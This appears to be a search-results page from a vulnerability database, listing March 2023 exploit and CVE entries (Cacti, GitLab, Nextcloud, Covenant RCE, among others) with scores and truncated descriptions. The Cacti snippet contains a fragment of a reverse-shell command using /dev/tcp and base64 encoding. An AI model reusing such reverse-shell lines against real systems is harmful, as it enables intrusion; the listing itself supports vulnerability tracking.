Lucene search
K

11234 matches found

GithubExploit
GithubExploit
added 2023/04/01 10:37 p.m.331 views

Exploit for Incorrect Authorization in Cacti

CVE-2022-46169 unaut...

9.8CVSS10AI score0.99826EPSS
Exploits48
Exploit DB
Exploit DB
added 2023/04/01 12:0 a.m.318 views

GitLab v15.3 - Remote Code Execution (RCE) (Authenticated)

Exploit Title: GitLab v15.3 - Remote Code Execution RCE Authenticated Date: 2022-12-25 Exploit Author: Antonio Francesco Sardella Vendor Homepage: https://about.gitlab.com/ Software Link: https://about.gitlab.com/install/ Version: GitLab CE/EE, all versions from 11.3.4 prior to 15.1.5, 15.2 to...

9.9CVSS9.8AI score0.75718EPSS
Exploits4
Exploit DB
Exploit DB
added 2023/04/01 12:0 a.m.393 views

AD Manager Plus 7122 - Remote Code Execution (RCE)

Exploit Title: AD Manager Plus 7122 - Remote Code Execution RCE Exploit Author: Chan Nyein Wai & Thura Moe Myint Vendor Homepage: https://www.manageengine.com/products/ad-manager/ Software Link: https://www.manageengine.com/products/ad-manager/download.html Version: Ad Manager Plus Before 7122...

10CVSS8.8AI score0.99999EPSS
Exploits347
Rapid7 Blog
Rapid7 Blog
added 2023/03/31 4:54 p.m.67 views

Metasploit Weekly Wrap-up

Windows 11 ADF WinSock Priv Esc The new windows/local/cve202321768afdlpe exploit makes use of a brand new Windows kernel exploitation technique that leverages the new I/O ring feature introduced in Windows 11 21H2. This technique comes from Yarden Shafir research and provides a full read/write...

10CVSS8.5AI score0.93384EPSS
Exploits23
0day.today
0day.today
added 2023/03/31 12:0 a.m.143 views

SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Remote Command Execution Vulnerability

Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Remote Command Execution RCE Exploit Author: LiquidWorm Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: FM/HD Radio Processing: Impact/Pulse/First Version 2: 1.1/2.15 Impact/Pulse/First...

6.8AI score
Exploits0
0day.today
0day.today
added 2023/03/31 12:0 a.m.139 views

Judging Management System v1.0 - Remote Code Execution Exploit

Exploit Title: Judging Management System v1.0 - Remote Code Execution RCE Exploit Author: Angelo Pio Amirante Vendor Homepage: https://www.sourcecodester.com/ Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html Version: 1.0...

6.8AI score
Exploits0
Exploit DB
Exploit DB
added 2023/03/31 12:0 a.m.696 views

Cacti v1.2.22 - Remote Command Execution (RCE)

Exploit Title: Cacti v1.2.22 - Remote Command Execution RCE Exploit Author: Riadh BOUCHAHOUA Discovery Date: 2022-12-08 Vendor Homepage: https://www.cacti.net/ Software Links : https://github.com/Cacti/cacti Tested Version: 1.2.2x /dev/tcp/self.rshost/self.rsport &1'" import base64 b64revshell =...

9.8CVSS9.8AI score0.99826EPSS
Exploits48
Exploit DB
Exploit DB
added 2023/03/31 12:0 a.m.163 views

SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Remote Command Execution (RCE)

Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Remote Command Execution RCE Exploit Author: LiquidWorm Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: FM/HD Radio Processing: Impact/Pulse/First Version 2: 1.1/2.15 Impact/Pulse/First...

7.4AI score
Exploits0
NVD
NVD
added 2023/03/30 7:15 p.m.20 views

CVE-2023-26482

Nextcloud server is an open source home cloud implementation. In affected versions a missing scope validation allowed users to create workflows which are designed to be only available for administrators. Some workflows are designed to be RCE by invoking defined scripts, in order to generate PDFs,...

9CVSS9AI score0.04176EPSS
Exploits2References2
Prion
Prion
added 2023/03/30 7:15 p.m.16 views

Design/Logic Flaw

Nextcloud server is an open source home cloud implementation. In affected versions a missing scope validation allowed users to create workflows which are designed to be only available for administrators. Some workflows are designed to be RCE by invoking defined scripts, in order to generate PDFs,...

6.5CVSS8.6AI score0.04176EPSS
Exploits2References2Affected Software1
OSV
OSV
added 2023/03/30 6:27 p.m.19 views

CVE-2023-26482 Scope of workflow operations is not validated in nextcloud server

Nextcloud server is an open source home cloud implementation. In affected versions a missing scope validation allowed users to create workflows which are designed to be only available for administrators. Some workflows are designed to be RCE by invoking defined scripts, in order to generate PDFs,...

9CVSS8.7AI score0.04176EPSS
Exploits2References4
Cvelist
Cvelist
added 2023/03/30 6:27 p.m.28 views

CVE-2023-26482 Scope of workflow operations is not validated in nextcloud server

Nextcloud server is an open source home cloud implementation. In affected versions a missing scope validation allowed users to create workflows which are designed to be only available for administrators. Some workflows are designed to be RCE by invoking defined scripts, in order to generate PDFs,...

9CVSS9.2AI score0.04176EPSS
Exploits2References2
CVE
CVE
added 2023/03/30 6:27 p.m.168 views

CVE-2023-26482

CVE-2023-26482 affects Nextcloud Server (24.x prior to 24.0.10 and 25.x prior to 25.0.4 in several sources). The issue is a missing scope validation for Workflow operations, allowing creation of workflows intended for admins to be usable by non-admin contexts and, in combination with certain apps...

9CVSS8.6AI score0.04176EPSS
Exploits2References2Affected Software1
Cvelist
Cvelist
added 2023/03/30 11:25 a.m.23 views

CVE-2023-28731 Unauthenticated RCE affecting the AcyMailing plugin for Joomla

AnyMailing Joomla Plugin is vulnerable to unauthenticated remote code execution, when being granted access to the campaign's creation on front-office due to unrestricted file upload allowing PHP code to be injected. This issue affects AnyMailing Joomla Plugin Enterprise in versions below 8.3.0...

9.8CVSS9.9AI score0.01782EPSS
Exploits1References2
Vulnrichment
Vulnrichment
added 2023/03/30 9:10 a.m.8 views

CVE-2023-28935 Apache UIMA DUCC: DUCC (EOL) allows RCE

UNSUPPORTED WHEN ASSIGNED Improper Neutralization of Special Elements used in a Command 'Command Injection' vulnerability in Apache Software Foundation Apache UIMA DUCC. When using the "Distributed UIMA Cluster Computing" DUCC module of Apache UIMA, an authenticated user that has the permissions ...

6.9AI score0.02957EPSS
Exploits0References1
Cvelist
Cvelist
added 2023/03/30 9:10 a.m.19 views

CVE-2023-28935 Apache UIMA DUCC: DUCC (EOL) allows RCE

UNSUPPORTED WHEN ASSIGNED Improper Neutralization of Special Elements used in a Command 'Command Injection' vulnerability in Apache Software Foundation Apache UIMA DUCC. When using the "Distributed UIMA Cluster Computing" DUCC module of Apache UIMA, an authenticated user that has the permissions ...

9AI score0.02957EPSS
Exploits0References1
Nextcloud
Nextcloud
added 2023/03/30 8:18 a.m.41 views

Scope of workflow operations is not validated

None...

9CVSS8.6AI score0.04176EPSS
Exploits2References1Affected Software1
Packet Storm
Packet Storm
added 2023/03/30 12:0 a.m.427 views

Covenant 0.5 Remote Code Execution

Exploit Title: Covenant v0.5 - Remote Code Execution RCE Exploit Author: xThaz Author website: https://xthaz.fr/ Date: 2022-09-11 Vendor Homepage: https://cobbr.io/Covenant.html Software Link: https://github.com/cobbr/Covenant Version: v0.1.3 - v0.5 Tested on: Windows 11 compiled covenant Windows...

6.8AI score
Exploits0
Exploit DB
Exploit DB
added 2023/03/30 12:0 a.m.192 views

Covenant v0.5 - Remote Code Execution (RCE)

Exploit Title: Covenant v0.5 - Remote Code Execution RCE Exploit Author: xThaz Author website: https://xthaz.fr/ Date: 2022-09-11 Vendor Homepage: https://cobbr.io/Covenant.html Software Link: https://github.com/cobbr/Covenant Version: v0.1.3 - v0.5 Tested on: Windows 11 compiled covenant Windows...

7.4AI score
Exploits0
Tenable Nessus
Tenable Nessus
added 2023/03/30 12:0 a.m.35 views

RHEL 8 : Red Hat JBoss Enterprise Application Platform 7.4.10 on RHEL 8 (RHSA-2023:1513)

The remote Redhat Enterprise Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the RHSA-2023:1513 advisory. Red Hat JBoss Enterprise Application Platform 7 is a platform for Java applications based on the WildFly application runtime. This release o...

9.8CVSS8AI score0.99615EPSS
Exploits10References44
Rows per page
Query Builder